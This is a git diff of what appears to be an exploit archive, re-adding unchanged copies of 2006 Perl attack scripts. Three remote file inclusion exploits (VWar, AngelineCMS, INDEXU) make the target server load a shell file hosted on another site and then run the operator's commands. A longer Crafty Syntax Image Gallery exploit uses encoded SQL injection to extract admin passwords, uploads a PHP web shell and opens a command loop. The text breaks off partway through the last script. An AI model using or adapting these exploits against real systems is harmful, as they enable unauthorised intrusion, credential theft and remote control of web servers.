-	$finreturn=~ tr/[ê]/[\n]/;
-	print "\r\n$finreturn\n\r";
-	last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " 	   *VWar <= 1.5.0 R12 Remote File Inclusion Exploit*\r\n";   
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl vwar.pl   \r\n\n";
- print "  - Full path to VWar ex: http://www.site.com/VWar/ \r\n";
- print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
- print "  - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "		           Bug Found by uid0\r\n";
- print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-02]
+#!/usr/bin/perl
+##
+# VWar <= 1.5.0 R12 Remote File Inclusion Exploit
+# Bug Found By uid0 code by zod
+## 
+# (c) 2006
+# ExploiterCode.com
+##
+# usage:
+# perl vwar.pl   
+#
+# perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd
+#
+# cmd shell example: 
+#
+# cmd shell variable: ($_GET[cmd]);
+##
+# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else!
+#
+# special shout to [ill]will!
+##
+# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
+##
+# Comments:
+# I release a new exploit because VWar
+# Dev. Team called my other exploit XSS!!!
+##
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+	print "[shell] \$";
+while()
+        {
+                $cmd=$_;
+                chomp($cmd);
+         
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'includes/get_header.php?vwar_root='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
+	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.+).Fatal.error/)
+
+
+{
+	$finreturn = $1;
+	$finreturn=~ tr/[ê]/[\n]/;
+	print "\r\n$finreturn\n\r";
+	last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " 	   *VWar <= 1.5.0 R12 Remote File Inclusion Exploit*\r\n";   
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl vwar.pl   \r\n\n";
+ print "  - Full path to VWar ex: http://www.site.com/VWar/ \r\n";
+ print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
+ print "  - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "		           Bug Found by uid0\r\n";
+ print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-02]
diff --git a/platforms/php/webapps/1640.pl b/platforms/php/webapps/1640.pl
index 529466956..8cf85aeb3 100755
--- a/platforms/php/webapps/1640.pl
+++ b/platforms/php/webapps/1640.pl
@@ -1,87 +1,87 @@
-#!/usr/bin/perl
-##
-# AngelineCMS 0.8.1 installpath Remote Code Execution Exploit
-# Bug Found & code By K-159 
-# code reference from uid0/zod at ExploiterCode.com
-##
-# echo.or.id (c) 2006
-# 
-##
-# usage:
-# perl angelineCMS.pl   
-#
-# perl angelineCMS.pl http://target.com/ http://site.com/cmd.txt cmd
-#
-# cmd shell example: 
-#
-# cmd shell variable: ($_GET[cmd]);
-##
-# #
-# 
-# Contact: www.echo.or.id #e-c-h-o @irc.dal.net
-##
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-       print "[shell] \$";
-while()
-       {
-               $cmd=$_;
-               chomp($cmd);
-
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'kernel/loadkernel.php?installPath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[Ã.ª]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
-       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.*)/)
-
-
-{
-       $finreturn = $1;
-       $finreturn=~ tr/[Ã.ª]/[\n]/;
-       print "\r\n$finreturn\n\r";
-       last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " *AngelineCMS 0.8.1 installpath Remote Code Execution Exploit*\r\n";
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl angelineCMS.pl   \r\n\n";
- print "  - Full path to angelineCMS ex: http://www.site.com/ \r\n";
- print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
- print "  - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "                           Bug Found by K-159 \r\n";
- print "                    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-04]
+#!/usr/bin/perl
+##
+# AngelineCMS 0.8.1 installpath Remote Code Execution Exploit
+# Bug Found & code By K-159 
+# code reference from uid0/zod at ExploiterCode.com
+##
+# echo.or.id (c) 2006
+# 
+##
+# usage:
+# perl angelineCMS.pl   
+#
+# perl angelineCMS.pl http://target.com/ http://site.com/cmd.txt cmd
+#
+# cmd shell example: 
+#
+# cmd shell variable: ($_GET[cmd]);
+##
+# #
+# 
+# Contact: www.echo.or.id #e-c-h-o @irc.dal.net
+##
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+       print "[shell] \$";
+while()
+       {
+               $cmd=$_;
+               chomp($cmd);
+
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'kernel/loadkernel.php?installPath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[Ã.ª]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
+       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.*)/)
+
+
+{
+       $finreturn = $1;
+       $finreturn=~ tr/[Ã.ª]/[\n]/;
+       print "\r\n$finreturn\n\r";
+       last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " *AngelineCMS 0.8.1 installpath Remote Code Execution Exploit*\r\n";
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl angelineCMS.pl   \r\n\n";
+ print "  - Full path to angelineCMS ex: http://www.site.com/ \r\n";
+ print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
+ print "  - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "                           Bug Found by K-159 \r\n";
+ print "                    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-04]
diff --git a/platforms/php/webapps/1644.pl b/platforms/php/webapps/1644.pl
index 51b3e1887..0bf5f33df 100755
--- a/platforms/php/webapps/1644.pl
+++ b/platforms/php/webapps/1644.pl
@@ -1,91 +1,91 @@
-#!/usr/bin/perl
-##
-# INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit
-# Bug Found & code By K-159
-#
-# base on advisory at http://echo.or.id/adv/adv26-K-159-2006.txt
-#
-# code reference from ExploiterCode.com
-##
-# www.echo.or.id (c) 2006
-#
-##
-# usage:
-# perl indexu.pl   
-#
-# perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd
-#
-# cmd shell example: 
-#
-# cmd shell variable: ($_GET[cmd]);
-##
-# #
-#greetz:echo|staff(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous),kaiten,an0maly,SinChan,sakitjiwa,rizal,etc
-#
-# Contact:  eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
-##
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-       print "[shell] \$";
-while()
-       {
-               $cmd=$_;
-               chomp($cmd);
-
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.' application.php?base_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
-       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.*)/)
-
-
-{
-       $finreturn = $1;
-       $finreturn=~ tr/[ê]/[\n]/;
-       print "\r\n$finreturn\n\r";
-       last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " *INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit*\r\n";
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl indexu.pl   \r\n\n";
- print "  - Full path to INDEXU ex: http://www.site.com/indexu/ \r\n";
- print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
- print "  - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "                           Bug Found by K-159 \r\n";
- print "                    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-04]
+#!/usr/bin/perl
+##
+# INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit
+# Bug Found & code By K-159
+#
+# base on advisory at http://echo.or.id/adv/adv26-K-159-2006.txt
+#
+# code reference from ExploiterCode.com
+##
+# www.echo.or.id (c) 2006
+#
+##
+# usage:
+# perl indexu.pl   
+#
+# perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd
+#
+# cmd shell example: 
+#
+# cmd shell variable: ($_GET[cmd]);
+##
+# #
+#greetz:echo|staff(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous),kaiten,an0maly,SinChan,sakitjiwa,rizal,etc
+#
+# Contact:  eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
+##
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+       print "[shell] \$";
+while()
+       {
+               $cmd=$_;
+               chomp($cmd);
+
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.' application.php?base_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
+       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.*)/)
+
+
+{
+       $finreturn = $1;
+       $finreturn=~ tr/[ê]/[\n]/;
+       print "\r\n$finreturn\n\r";
+       last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " *INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit*\r\n";
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl indexu.pl   \r\n\n";
+ print "  - Full path to INDEXU ex: http://www.site.com/indexu/ \r\n";
+ print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
+ print "  - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "                           Bug Found by K-159 \r\n";
+ print "                    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-04]
diff --git a/platforms/php/webapps/1645.pl b/platforms/php/webapps/1645.pl
index b83536161..5c34a99cc 100755
--- a/platforms/php/webapps/1645.pl
+++ b/platforms/php/webapps/1645.pl
@@ -1,539 +1,539 @@
-#!/usr/bin/perl
-###############################################################################
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License
-# as published by the Free Software Foundation; either version 2
-# of the License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
-###############################################################################
-
-# =====================================================
-# $ crappy_syntax.pl localhost/csig/ 80
-#
-# :: crafty syntax image gallery <= 3.1g
-# :: by undefined1_ @ bash-x.net/undef/
-# :: note: this works only on mysql >= 4.0
-#
-#
-# [+] creating user account
-# [+]		user: 98fe56123
-#			password: 7652L4M3l39q
-#			email: SehswdSx0E@hotmail.com
-# [+] user '98fe56123' with password '7652L4M3l39q' registered
-# [+] logged in as 98fe56123
-# [+] projectid is 2
-# [-] no admin found for this projectid, trying the username 'admin'
-# [+] admin username: 'admin'
-# [+] admin password: '1111'
-# [+] logged in as 'admin'
-# [+] getting shell location
-# [+] shell @ 'userimages/1/18d76bcbc6f2.php'
-# [+] have phun?
-#
-# localhost$ uname
-# Linux
-# localhost$ whoami
-# nobody
-# =====================================================
-
-use strict; 
-use IO::Socket;
-
-$| = 1;
-print ":: crafty syntax image gallery <= 3.1g\n";
-print ":: by undefined1_ @ bash-x.net/undef/\n";
-print ":: note: this works only on mysql >= 4.0\n\n\n";
-
-my $website = shift || usage();
-my $port = shift || usage();
-my $user = shift;
-my $password = shift;
-my $location = shift;
-
-
-
-my $path = "/";
-my $server = $website;
-if(index($website, "/") != -1)
-{
-	$path = substr($website, index($website, "/"));
-	$server = substr($website, 0, index($website, "/"));
-	if(substr($path, length($path)-1) ne "/")
-	{
-		$path .= "/";
-	}
-}
-if($location eq "")
-{
-	if($user eq "" && $password eq "")
-	{
-		print "[+] creating user account\n";
-		$user = randstring(8,12);
-		$password = randstring(8,12);
-		my $email = randstring(8,12)."\@hotmail.com";
-		printf("[+]\tuser: %s\n", $user);
-		printf("\tpassword: %s\n", $password);
-		printf("\temail: %s\n", $email);
-		register($server, $path, $user, $user, $password, $email);
-	}
-
-	my $cookies = login($server, $port, $path, $user, $password);
-	my $projectid = get_projectid($server, $port, $path, $cookies);
-	my @admin = send_payload($server, $port, $path, $cookies, $projectid);
-
-	$cookies = login($server, $port, $path, $admin[0], $admin[1]);
-	upload_shell($server, $port, $path, $cookies, $projectid);
-	$location = get_shell_location($server,$port,$path,$cookies);
-}
-
-check_shell($server, $port, $path, $location);
-printf("[+] have phun?\n\n");
-my $command;
-while(1) 
-{
-	print $server."\$ ";
-	while() 
-	{
-		$command = $_;
-		chomp($command);
-		last;
-	}
-	do_shell($server,$port,$path,$location,$command);
-}
-
-
-sub send_payload(\$,\$,\$,\$,\$) {
-	my $server = shift;
-	my $port = shift;
-	my $path = shift;
-	my $cookies = shift;
-	my $projectid = shift;
-	my $shellcode;
-
-	$shellcode  = "\x61\x6e\x64\x20\x31\x3d\x30\x20\x75\x6e\x69\x6f\x6e\x20";
-	$shellcode .= "\x61\x6c\x6c\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32";
-	$shellcode .= "\x2c\x33\x2c\x34\x2c\x35\x2c\x75\x73\x65\x72\x69\x64\x20";
-	$shellcode .= "\x61\x73\x20\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
-	$shellcode .= "\x2c\x37\x2c\x38\x2c\x39\x2c\x30\x2c\x31\x2c\x32\x2c\x33";
-	$shellcode .= "\x2c\x34\x2c\x35\x2c\x35\x20\x66\x72\x6f\x6d\x20\x67\x61";
-	$shellcode .= "\x6c\x6c\x65\x72\x79\x5f\x61\x63\x63\x65\x73\x73\x20\x77";
-	$shellcode .= "\x68\x65\x72\x65\x20\x67\x61\x6c\x6c\x65\x72\x79\x69\x64";
-	$shellcode .= "\x3d";
-	$shellcode .= $projectid;
-	$shellcode .= "\x20\x61\x6e\x64\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f";
-	$shellcode .= "\x6e\x73\x3d\x43\x4f\x4e\x43\x41\x54\x28\x30\x78\x34\x36";
-	$shellcode .= "\x35\x35\x34\x63\x34\x63\x29\x20\x2d\x2d";
-
-	my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= $cookies;
-	$query .= "\r\n";
-	my $data = sendpacket($server, $port, $query);
-	if($data !~ /photo_captions\[1\] = "/)
-	{
-		print "[-] no admin found for this projectid, trying the username 'admin'\n";
-		$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --";
-		$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
-		$query .= "Host: $server\r\n";
-		$query .= "User-Agent: Mozilla/5.0\r\n";
-		$query .= "Connection: close\r\n";
-		$query .= $cookies;
-		$query .= "\r\n";
-		my $data = sendpacket($server, $port, $query);
-		if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
-		{
-			print "[-] exploit failed\n";
-			exit;
-		}
-		my $index1 = index($data, "photo_captions[1] = \" ") + 22;
-		my $index2 = index($data, "\"", $index1);
-		my $passwd = substr($data, $index1, $index2-$index1);
-
-		$index1 = index($data, "photo_urls[1] = \"") + 17;
-		$index2 = index($data, "\"", $index1);
-		$data = substr($data, $index1, $index2-$index1);
-		$index1 = rindex($data, "/") + 1;
-		my $username = substr($data, $index1);
-
-
-		print "[+] admin username: '$username'\n";
-		print "[+] admin password: '$passwd'\n";
-
-		my @ret;
-		push(@ret, $username);
-		push(@ret, $passwd);
-		return @ret;
-	}
-	my $index1 = index($data, "photo_captions[1] = \" ") + 22;
-	my $index2 = index($data, "\"", $index1);
-	my $uid = substr($data, $index1, $index2-$index1);
-	print "[+] admin uid: '$uid'\n";
-
-
-
-
-
-	$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=".$uid." --";
-	$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= $cookies;
-	$query .= "\r\n";
-	my $data = sendpacket($server, $port, $query);
-	if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
-	{
-		print "[-] exploit failed (mysql < 4 ?)\n";
-		exit;
-	}
-	$index1 = index($data, "photo_captions[1] = \" ") + 22;
-	$index2 = index($data, "\"", $index1);
-	my $passwd = substr($data, $index1, $index2-$index1);
-
-	$index1 = index($data, "photo_urls[1] = \"") + 17;
-	$index2 = index($data, "\"", $index1);
-	$data = substr($data, $index1, $index2-$index1);
-	$index1 = rindex($data, "/") + 1;
-	my $username = substr($data, $index1);
-
-
-	print "[+] admin username: '$username'\n";
-	print "[+] admin password: '$passwd'\n";
-
-	my @ret;
-	push(@ret, $username);
-	push(@ret, $passwd);
-	return @ret;
-}
-
-
-sub do_shell(\$,\$,\$,\$,\$) {
-	my $server = shift;
-	my $port = shift;
-	my $path = shift;
-	my $location = shift;
-	my $command = shift;
-
-	my $d = "c=".$command;
-	my $query = "POST ".$path.$location." HTTP/1.1\r\n";
-	$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= "Content-Length: ".length($d)."\r\n";
-	$query .= "\r\n";
-	$query .= $d;
-	
-	my $data = sendpacket($server, $port, $query);
-	my $index = index($data, "\r\n\r\n");
-	if($index >= 0)
-	{
-		print substr($data, $index+4)."\n";
-	}
-	else
-	{
-		print "[-] shell error?\n";
-	}
-}
-
-sub check_shell(\$,\$,\$,\$) {
-	my $server = shift;
-	my $port = shift;
-	my $path = shift;
-	my $location = shift;
-
-	
-	my $query = "GET ".$path.$location." HTTP/1.1\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= "\r\n";
-	my $data = sendpacket($server, $port, $query);
-
-	if($data !~ /HTTP\/1.1 200 OK/)
-	{
-		print "[-] shell not found\n";
-		print "[-] try ".$server.$path."/userimages/\n";
-		exit;
-	}
-}
-
-sub get_shell_location(\$,\$,\$,\$) {	
-	print "[+] getting shell location\n";
-	my $server = shift;
-	my $port = shift;
-	my $path = shift;
-	my $cookies = shift;
-	my $shellcode;
-
-	$shellcode  = "\x61\x6e\x64\x20\x69\x6d\x61\x67\x65\x20\x4c\x49\x4b\x45\x20\x43";
-	$shellcode .= "\x4f\x4e\x43\x41\x54\x28\x30\x78\x32\x35\x32\x65\x37\x30\x36\x38";
-	$shellcode .= "\x37\x30\x29\x20\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x72\x65\x63";
-	$shellcode .= "\x6e\x6f\x20\x64\x65\x73\x63\x20\x6c\x69\x6d\x69\x74\x20\x31\x20";
-	$shellcode .= "\x2d\x2d";
-
-	
-	my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= $cookies;
-	$query .= "\r\n";
-	my $data = sendpacket($server, $port, $query);
-	if($data =~ /There are no photos in this gallery/)
-	{
-		print "[-] shell not found\n";
-		print "[-] try ".$server.$path."/userimages/\n";
-		exit;
-	}
-
-	my $index1 = index($data, "photo_urls[1] = \"") + 17;
-	my $index2 = index($data, "\"", $index1);
-	my $location = substr($data, $index1, $index2-$index1);
-	print "[+] shell @ '".$location."'\n";
-	return $location;
-}
-
-sub get_projectid(\$,\$,\$,\$) {
-	my $server = shift;
-	my $port = shift;
-	my $path = shift;
-	my $cookies = shift;
-	
-	my $query = "GET ".$path."imagemenu.php?html=menu.tpl HTTP/1.1\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= $cookies;
-	$query .= "\r\n";
-	my $data = sendpacket($server, $port, $query);
-	my $projectid;
-	if($data =~ /\?projectid=([0-9]*)/)
-	{
-		$projectid = $1;
-	}
-	else
-	{
-		print "[-] no projectid found";
-		exit;
-	}
-
-	print "[+] projectid is '$projectid'\n";
-	return $projectid;
-}
-
-sub upload_shell(\$,\$,\$,\$,\$) {
-	my $server = shift;
-	my $port = shift;
-	my $path = shift;
-	my $cookies = shift;
-	my $projectid = shift;
-	
-	my $query = "GET ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= $cookies;
-	$query .= "\r\n";
-	my $data = sendpacket($server, $port, $query);
-	if($data =~ /Access denied.../)
-	{
-		print "[-] no admin privileges (mysql < 4.0 ?)\n";
-		exit;
-	}
-
-	my $shell = "";
-
-	my $boundary = "-----------------------------220162907215434";
-	my $post = "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"projectid\"\r\n\r\n";
-	$post .= $projectid."\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"A_MONTH\"\r\n\r\n";
-	$post .= "03\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"A_DAY\"\r\n\r\n";
-	$post .= "26\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"A_YEAR\"\r\n\r\n";
-	$post .= "2006\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"fullimage\"; filename=\"my_image.jpg\"\r\n";
-	$post .= "Content-Type: text/plain\r\n\r\n";
-	$post .= $shell."\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"description\"\r\n\r\n";
-	$post .= "another image\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"ext\"\r\n\r\n";
-	$post .= ".php\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"feature__".$projectid."\"\r\n\r\n";
-	$post .= "Y\r\n";
-
-	$post .= "--".$boundary."\r\n";
-	$post .= "Content-Disposition: form-data; name=\"addnow\"\r\n\r\n";
-	$post .= "ADD\r\n";
-
-	$post .= "--".$boundary."--\r\n";
-
-	my $query  = "POST ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
-	$query .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= $cookies;
-	$query .= "Content-Length: ".length($post)."\r\n";
-	$query .= "\r\n";
-	$query .= $post;
-
-	sendpacket($server, $port, $query);
-}
-
-sub login(\$,\$,\$,\$,\$) {
-	my $server = shift;
-	my $port = shift;
-	my $path = shift;
-	my $username = shift;
-	my $password = shift;
-
-	my $d = "whattodo=login&myusername=".$username."&mypassword=".$password;
-	my $query = "POST ".$path."index.php HTTP/1.1\r\n";
-	$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= "Content-Length: ".length($d)."\r\n";
-	$query .= "\r\n";
-	$query .= $d;
-
-	my $data = sendpacket($server, $port, $query);
-	if($data =~ /Your Name:<\/td>= 0)
-	{
-		my $index2 = index($data, "Set-Cookie: ") + 12;
-		my $index3 = index($data, "\r\n", $index2);
-		$cookies = "Cookie: ".substr($data, $index2, $index3-$index2+2);
-	}
-	
-	print "[+] logged in as '$username'\n";
-	return $cookies;
-}
-
-sub register(\$, \$, \$, \$, \$, \$, \$) {
-	my $server = shift;
-	my $path = shift;
-	my $name = shift;
-	my $user = shift;
-	my $password = shift;
-	my $email = shift;
-
-	my $d = "action=register&emailadd=".$email."&newname=".$name."&newusername=".$user."&newpassword=".$password;
-	my $query = "POST ".$path."lostsheep.php HTTP/1.1\r\n";
-	$query .= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$query .= "Host: $server\r\n";
-	$query .= "User-Agent: Mozilla/5.0\r\n";
-	$query .= "Connection: close\r\n";
-	$query .= "Content-Length: ".length($d)."\r\n";
-	$query .= "\r\n";
-	$query .= $d;
-
-	my $data = sendpacket($server, $port, $query);
-	if($data =~ /
  • Sorry the username you entered <\/b> is already taken.. try again/)
-	{
-		print "[-] failed: username taken\n";
-		exit;
-	}
-	if($data =~ /you did not enter in a/)
-	{
-		print "[-] failed\n";
-		exit;
-	}
-	print "[+] user '$user' with password '$password' registered\n";
-}
-
-sub sendpacket(\$,\$,\$) {
-	my $server = shift;
-	my $port = shift;
-	my $request = shift;
-
-	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die "[-] Could not connect to $server:$port $!\n";
-	print $sock "$request";
-
-	
-	my $data = "";
-	my $answer;
-	while($answer = <$sock>)
-	{
-		$data .= $answer;
